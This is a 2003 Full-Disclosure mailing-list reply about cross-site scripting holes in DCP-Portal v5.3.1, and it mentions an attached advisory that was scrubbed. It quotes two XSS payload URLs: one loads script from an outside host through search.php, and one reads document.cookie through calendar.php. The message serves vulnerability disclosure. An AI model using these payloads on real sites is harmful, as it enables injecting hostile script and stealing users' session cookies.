Message-ID: <20030319190125.5ea412b1.mcbethh@op.pl>
From: mcbethh at op.pl (mcbethh@...pl)
Subject: Re: Some XSS vulns

On Wed, 19 Mar 2003 01:59:35 +0200
Ertan Kurt <ertank@...mpos.org> wrote:

> DCP-Portal v5.3.1
> http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></script>
> http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
> Vendor Site: http://www.dcp-portal.org

I've found many more vulnerabilities in dcp-portal... look at attached
advisory.

Regards
Grzegorz Aksamit

----------------------------------------------------------
( signature censored )
---------------------------------[ grzegorz aksamit ]-----

-------------- next part --------------
A non-text attachment was scrubbed...
Name: dcp-advisory-06-02-2003.txt
Type: application/octet-stream
Size: 4540 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030319/8f53bed6/dcp-advisory-06-02-2003.obj